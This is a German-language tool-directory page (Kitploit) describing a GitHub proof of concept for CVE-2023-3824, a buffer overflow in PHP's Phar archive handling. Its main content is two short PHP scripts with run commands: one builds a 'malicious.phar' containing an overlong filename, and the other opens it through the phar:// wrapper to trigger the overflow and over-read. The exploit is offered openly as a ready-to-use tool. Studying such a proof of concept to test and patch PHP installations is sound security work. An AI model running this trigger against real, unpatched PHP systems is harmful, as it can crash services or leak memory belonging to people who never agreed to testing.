Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-3824 — Schwachstelle in PHP Phar-Dateien, aufgrund eines Pufferüberlaufs, entsteht durch unzureichende Längenprüfungen von Dateinamen innerhalb des Phar-Archivs. Angreifer können Phar-Dateien mit langen Dateinamen erstellen, was zu einem Pufferüberlauf und möglicher Ausführung von schädlichem Code oder Datenlecks führen kann. Diese Schwachstelle kann für die Codeausführung CVE-2023-3824 ausgenutzt werden. | Kitploit
Tools/GitHubGitHub/jhonnybonny/cve-2023-3824
Payload-GenerierungSchwachstellenanalyseExploitationLernen & BildungBinary-Exploitation
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
3246vor 2 JahrenNoch nicht geprüft

Über

Schwachstelle in PHP Phar-Dateien, aufgrund eines Pufferüberlaufs, entsteht durch unzureichende Längenprüfungen von Dateinamen innerhalb des Phar-Archivs. Angreifer können Phar-Dateien mit langen Dateinamen erstellen, was zu einem Pufferüberlauf und möglicher Ausführung von schädlichem Code oder Datenlecks führen kann. Diese Schwachstelle kann für die Codeausführung CVE-2023-3824 ausgenutzt werden.

Teilen

PHP Schädliche Phar-Datei PoC (CVE-2023-3824)

Beschreibung

Dieses Proof of Concept (PoC) demonstriert, wie man eine schädliche Phar-Datei in PHP erstellt und eine Pufferüberlauf-Schwachstelle auslöst.

Verwendung

Erstellen der schädlichen Phar-Datei

  1. Erstellen Sie eine neue PHP-Datei (z. B. create_phar.php) und fügen Sie den folgenden Code hinzu:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

Führen Sie das PHP-Skript aus, um die schädliche Phar-Datei zu erstellen: Code kopieren

root@kitploit:~
php create_phar.php

Auslösen des Pufferüberlaufs

Erstellen Sie eine weitere PHP-Datei (z. B. trigger_overflow.php) und fügen Sie den folgenden Code hinzu:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

Führen Sie das PHP-Skript aus, um den Pufferüberlauf auszulösen: Code kopieren

root@kitploit:~
php trigger_overflow.php

Die var_dump($x)-Anweisung gibt das Ergebnis des Pufferüberlaufs und des Überlesevorgangs aus.

Tool herunterladen